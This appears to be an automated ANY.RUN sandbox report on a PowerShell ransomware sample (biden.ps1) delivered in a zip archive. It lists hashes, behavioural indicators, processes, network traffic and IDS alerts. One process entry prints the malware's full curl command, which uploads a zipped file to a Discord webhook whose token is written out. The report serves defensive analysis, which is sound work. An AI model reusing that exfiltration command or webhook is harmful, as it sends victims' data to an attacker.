File name:

240321-gbmqbscg78_pw_infected.zip

Full analysis: https://app.any.run/tasks/8d10e5b2-f2db-43f8-a764-62ed9b1d821b
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: March 28, 2024, 12:01:28
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
ransomware
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
MD5:

E5F0842A39F8BE04BE0822D2D6D47C2B

SHA1:

7E003234C008B2E29DF18070FD9F9FE58360C7FF

SHA256:

6DECBB12CD1AA7BF5BC1244DC6974946808374365FB77DD4DDCEE8C9216FE0FB

SSDEEP:

192:+Sk30XBYGZqvIsIVgfIAEvX4eY0wM1kPq5IHNb+P:pPYG2IVGI5E0wQkUQk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • csc.exe (PID: 4616)
  • SUSPICIOUS

    • Non-standard symbols in registry

      • POWERPNT.EXE (PID: 7068)
    • Retrieves a substring from a string (POWERSHELL)

      • powershell.exe (PID: 6772)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 6772)
    • Unusual connection from system programs

      • powershell.exe (PID: 6772)
    • Reads security settings of Internet Explorer

      • TextInputHost.exe (PID: 6548)
    • Creates files like ransomware instruction

      • powershell.exe (PID: 6772)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6772)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6772)
    • Checks for external IP

      • powershell.exe (PID: 6772)
    • Changes the desktop background image

      • powershell.exe (PID: 6772)
  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 4272)
      • POWERPNT.EXE (PID: 7068)
      • powershell.exe (PID: 6772)
      • mspaint.exe (PID: 7148)
    • Reads the computer name

      • TextInputHost.exe (PID: 6548)
      • curl.exe (PID: 5292)
    • Checks proxy server information

      • powershell.exe (PID: 6772)
      • slui.exe (PID: 1488)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 4616)
    • Checks supported languages

      • TextInputHost.exe (PID: 6548)
      • curl.exe (PID: 5292)
      • csc.exe (PID: 4616)
      • cvtres.exe (PID: 6352)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 6504)
    • Create files in a temporary directory

      • csc.exe (PID: 4616)
      • cvtres.exe (PID: 6352)
    • Reads the software policy settings

      • slui.exe (PID: 1488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Unknown (99)
ZipModifyDate: 1980:00:00 00:00:00
ZipCRC: 0x00000000
ZipCompressedSize: 3983
ZipUncompressedSize: 10033
ZipFileName: biden.ps1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
14
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs powershell.exe no specs conhost.exe no specs textinputhost.exe no specs powerpnt.exe powershell.exe conhost.exe no specs slui.exe curl.exe notepad.exe no specs csc.exe no specs cvtres.exe no specs mspaint.exe no specs filecoauth.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1488C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2360C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
3196\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4272"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -p "C:\Users\admin\Desktop\biden.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294705152
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
4616"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\l54pl24x.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
5292"C:\WINDOWS\system32\curl.exe" -X POST -F "payload_json={\"username\": \"BIDEN\", \"content\": \"\", \"avatar_url\": \"https://i.ibb.co/VMjZW4N/jb.png\"}" -F file=@C:\Users\admin\desktop\biden.zip https://discord.com/api/webhooks/1220036894637948948/ljquzH5wIR176Vyn4DgBic0VaTCxSnsoZhUPJDI9xnRlz13VlyOzp6XdLsg3OgwSI4x3C:\Windows\System32\curl.exe
powershell.exe
User:
admin
Company:
curl, https://curl.haxx.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
35
Version:
7.55.1
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\secur32.dll
6352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES4414.tmp" "c:\Users\admin\AppData\Local\Temp\CSCCF281DC82EE347AC92AEB5F7F3E78542.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase_clr0400.dll
c:\windows\system32\vcruntime140_clr0400.dll
6504"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\README.txtC:\Windows\System32\notepad.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
6548"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
2001.22012.0.3920
Modules
Images
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\inputapp\textinputhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\program files\windowsapps\microsoft.vclibs.140.00_14.0.27323.0_x64__8wekyb3d8bbwe\vcruntime140_app.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
6772"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events
39 611
Read events
39 294
Write events
226
Delete events
91

Modification events

(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\240321-gbmqbscg78_pw_infected.zip
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6908) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\38\52C64B7E
Operation:writeName:@"C:\WINDOWS\system32\windowspowershell\v1.0\powershell.exe",-107
Value:
Windows PowerShell Console File
(PID) Process:(6908) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
Executable files
1
Suspicious files
4
Text files
11
Unknown types
27

Dropped files

PID
Process
Filename
Type
6908WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb6908.29577\biden.ps1text
MD5:
SHA256:
4272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QVGZGNRPGYGMLPQJGNIB.tempbinary
MD5:
SHA256:
4272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe655d.TMPbinary
MD5:
SHA256:
4272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.Settings.jsonbinary
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.SurveyEventActivityStats.jsonbinary
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.CampaignStates.jsonbinary
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.SurveyHistoryStats.jsonbinary
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.GovernedChannelStates.jsonbinary
MD5:
SHA256:
7068POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\1DD13844.tmpbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
70
TCP/UDP connections
81
DNS requests
39
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
92.123.104.34:443
https://www.bing.com/AS/API/WindowsCortanaPane/V2/Suggestions?qry=pow&setlang=en-US&cc=GB&nohs=1&qfm=1&cp=3&cvid=499a4cb3dd3a49b0bf612f7566e79152&ig=f070a68b2f0d4c6a84b1604717a52edc
unknown
binary
5.95 Kb
6856
SIHClient.exe
GET
304
20.114.59.183:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL
unknown
GET
200
92.123.104.43:443
https://www.bing.com/AS/API/WindowsCortanaPane/V2/Suggestions?qry=powe&setlang=en-US&cc=GB&nohs=1&qfm=1&cp=4&cvid=499a4cb3dd3a49b0bf612f7566e79152&ig=25d9ff0ffaa3453cad337cd7f8207b26
unknown
binary
6.87 Kb
6856
SIHClient.exe
GET
200
20.114.59.183:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL
unknown
5272
SearchApp.exe
GET
204.79.197.222:443
https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
unknown
6856
SIHClient.exe
GET
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
unknown
GET
200
92.123.104.36:443
https://www.bing.com/manifest/threshold.appcache
unknown
text
3.13 Kb
GET
200
92.123.104.35:443
https://www.bing.com/dsb/scenario?name=TrendingSearchWithCache&cc=gb&setlang=en-us
unknown
binary
573 b
POST
204
92.123.104.35:443
https://www.bing.com/threshold/xls.aspx
unknown
GET
200
92.123.104.32:443
https://www.bing.com/AS/API/WindowsCortanaPane/V2/Suggestions?qry=p&setlang=en-US&cc=GB&nohs=1&qfm=1&cp=1&cvid=499a4cb3dd3a49b0bf612f7566e79152&ig=530c8211815e48ebb6483a2b71c6a938
unknown
binary
4.75 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6856
SIHClient.exe
52.165.165.26:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
5272
SearchApp.exe
92.123.104.52:443
Akamai International B.V.
DE
unknown
5272
SearchApp.exe
51.105.71.136:443
browser.pipe.aria.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
unknown
5272
SearchApp.exe
92.123.104.12:443
r.bing.com
Akamai International B.V.
DE
unknown
3996
svchost.exe
20.190.159.23:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
6856
SIHClient.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5272
SearchApp.exe
92.123.104.18:443
r.bing.com
Akamai International B.V.
DE
unknown
5272
SearchApp.exe
204.79.197.222:443
fp.msedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7068
POWERPNT.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
unknown
2772
backgroundTaskHost.exe
20.103.156.88:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown

DNS requests

Domain
IP
Reputation
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted
browser.pipe.aria.microsoft.com
  • 51.105.71.136
whitelisted
r.bing.com
  • 92.123.104.12
  • 92.123.104.18
  • 92.123.104.7
  • 92.123.104.4
  • 92.123.104.14
  • 92.123.104.5
  • 92.123.104.65
  • 92.123.104.66
  • 92.123.104.10
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
www.bing.com
  • 92.123.104.18
  • 92.123.104.12
  • 92.123.104.14
  • 92.123.104.4
  • 92.123.104.7
  • 92.123.104.66
  • 92.123.104.10
  • 92.123.104.5
  • 92.123.104.65
whitelisted
fp.msedge.net
  • 204.79.197.222
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
omex.cdn.office.net
  • 23.48.23.11
  • 23.48.23.45
  • 23.48.23.30
  • 23.48.23.62
whitelisted

Threats

PID
Process
Class
Message
2160
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
6772
powershell.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
6772
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Possible IP Check api.ipify.org
2160
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
6772
powershell.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
5292
curl.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
No debug info